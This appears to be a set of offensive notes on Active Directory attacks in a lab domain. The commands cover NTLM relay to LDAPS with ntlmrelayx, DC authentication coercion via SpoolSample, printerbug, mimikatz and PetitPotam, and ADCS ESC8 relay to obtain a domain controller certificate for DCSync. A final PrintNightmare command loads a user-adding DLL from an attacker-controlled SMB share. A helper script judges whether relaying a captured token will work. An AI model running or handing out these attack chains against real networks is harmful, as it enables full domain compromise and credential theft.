Relay HTTP (or any source other than SMB: SMB clients set the NTLM sign flag, which LDAP honours, so SMB-to-LDAP relay fails) to LDAP(S) to dump the domain or, if the relayed account is privileged, create a new admin user:
python3 ntlmrelayx.py -t ldaps://10.55.0.1
mitm6
arp spoofing
adidns
responder
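To see why the source protocol matters for LDAP targets, the following added example (not part of the original notes) decodes the base64 NTLMSSP token a victim sends (e.g. the `Authorization: NTLM ...` header a poisoned WPAD/HTTP client emits) and reports whether the NEGOTIATE_SIGN/NEGOTIATE_SEAL flags are set; ntlmrelayx refuses to relay such a client to an ldap:// or ldaps:// target. The two sample tokens are constructed in the script with flag values typical of a Windows HTTP client and of the Windows SMB client; they are not captured traffic.

```python
"""Inspect an NTLMSSP token and decide whether relaying it to LDAP/LDAPS can work."""
import base64
import struct

# NegotiateFlags from MS-NLMP 2.2.2.5 (subset that matters here).
FLAG_NAMES = {
    0x00000001: "NTLMSSP_NEGOTIATE_UNICODE",
    0x00000002: "NTLMSSP_NEGOTIATE_OEM",
    0x00000004: "NTLMSSP_REQUEST_TARGET",
    0x00000010: "NTLMSSP_NEGOTIATE_SIGN",
    0x00000020: "NTLMSSP_NEGOTIATE_SEAL",
    0x00000200: "NTLMSSP_NEGOTIATE_NTLM",
    0x00008000: "NTLMSSP_NEGOTIATE_ALWAYS_SIGN",
    0x00080000: "NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x02000000: "NTLMSSP_NEGOTIATE_VERSION",
    0x20000000: "NTLMSSP_NEGOTIATE_128",
    0x40000000: "NTLMSSP_NEGOTIATE_KEY_EXCH",
    0x80000000: "NTLMSSP_NEGOTIATE_56",
}
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_SEAL = 0x00000020
NTLMSSP_NEGOTIATE_VERSION = 0x02000000

SIGNATURE = b"NTLMSSP\x00"
# Byte offset of NegotiateFlags in NEGOTIATE (1), CHALLENGE (2) and AUTHENTICATE (3) messages.
FLAGS_OFFSET = {1: 12, 2: 20, 3: 60}


def build_negotiate(flags, version=b"\x0a\x00\xba\x47\x00\x00\x00\x0f"):
    """Construct a minimal NEGOTIATE_MESSAGE (empty domain/workstation) as base64.
    Only used to fabricate sample tokens for this example."""
    msg = SIGNATURE + struct.pack("<II", 1, flags)
    msg += struct.pack("<HHI", 0, 0, 0) * 2  # DomainNameFields + WorkstationFields, both empty
    if flags & NTLMSSP_NEGOTIATE_VERSION:
        msg += version  # 8-byte VERSION structure (major, minor, build, reserved, revision)
    return base64.b64encode(msg).decode()


def parse_ntlm_token(token):
    """Return (message_type, negotiate_flags) for a base64 NTLMSSP token."""
    raw = base64.b64decode(token)
    if len(raw) < 12 or raw[:8] != SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", raw, 8)[0]
    if msg_type not in FLAGS_OFFSET:
        raise ValueError(f"unknown NTLMSSP message type {msg_type}")
    off = FLAGS_OFFSET[msg_type]
    if len(raw) < off + 4:
        raise ValueError("truncated NTLMSSP message")
    return msg_type, struct.unpack_from("<I", raw, off)[0]


def flag_names(flags):
    return [name for bit, name in FLAG_NAMES.items() if flags & bit]


def ldap_relay_viable(flags):
    """LDAP(S) relay only works when the client did not ask for signing or sealing."""
    return not flags & (NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_SEAL)


def assess(token):
    msg_type, flags = parse_ntlm_token(token)
    return {
        "type": msg_type,
        "flags": flags,
        "set": flag_names(flags),
        "ldap_relay": ldap_relay_viable(flags),
    }


# Constructed sample tokens (fabricated, not captured): flag values typical of a Windows
# HTTP client (what mitm6/WPAD or Responder hands you) and of the Windows SMB client
# (what printerbug/PetitPotam coercion hands you).
HTTP_CLIENT_TOKEN = build_negotiate(0xA2088207)  # no SIGN/SEAL: relay to ldaps:// works
SMB_CLIENT_TOKEN = build_negotiate(0xE2088297)   # SIGN set: ntlmrelayx rejects ldap(s) target

if __name__ == "__main__":
    for label, tok in (("http client", HTTP_CLIENT_TOKEN), ("smb client", SMB_CLIENT_TOKEN)):
        info = assess(tok)
        print(f"{label}: type {info['type']} flags 0x{info['flags']:08x} "
              f"ldap relay {'OK' if info['ldap_relay'] else 'BLOCKED'}")
        print("  " + ", ".join(info["set"]))
```

Feed it the token from a real `Authorization: NTLM` header or from the NTLMSSP blob in an SMB Session Setup to confirm what the relay can target before spending the coerced authentication; the SIGN flag cannot simply be stripped in transit because the AUTHENTICATE message's MIC covers it.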

adcs esc8 (relay to the AD CS web enrollment endpoint; it is HTTP with no signing, so SMB-sourced DC authentication relays fine here)
coerce the DC (10.55.0.1) to authenticate to the relay host (10.55.0.30 / kali.lab.local):
.\SpoolSample.exe 10.55.0.1 10.55.0.30
python3 printerbug.py mcafeelab.local/user123:SuperSecretPW@10.55.0.1 10.55.0.30
mimikatz # misc::spooler /server:dc1.lab.local /connect:kali.lab.local /authuser:domadm@lab.local /authpassword:secr3tpass
PetitPotam (coercion over MS-EFSR; unauthenticated against unpatched hosts, otherwise needs creds; also possible from mimikatz: mimikatz # misc::efs /server:10.1.1.1 /connect:10.1.1.10 /noauth)

python3 ntlmrelayx.py -t http://10.55.0.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
ntlmrelayx prints the issued certificate as a base64 PFX for the DC machine account; use it with PKINIT (gettgtpkinit.py or certipy auth) to get a TGT for that account, then DCSync.

print nightmare (CVE-2021-34527: the spooler loads an attacker-supplied DLL from a UNC path, so host the DLL on an SMB share you control)
mimikatz # misc::printnightmare /server:dc1.lab.local /authuser:bla /authpassword:bla /library:\\kali.lab.local\share\useradd.dll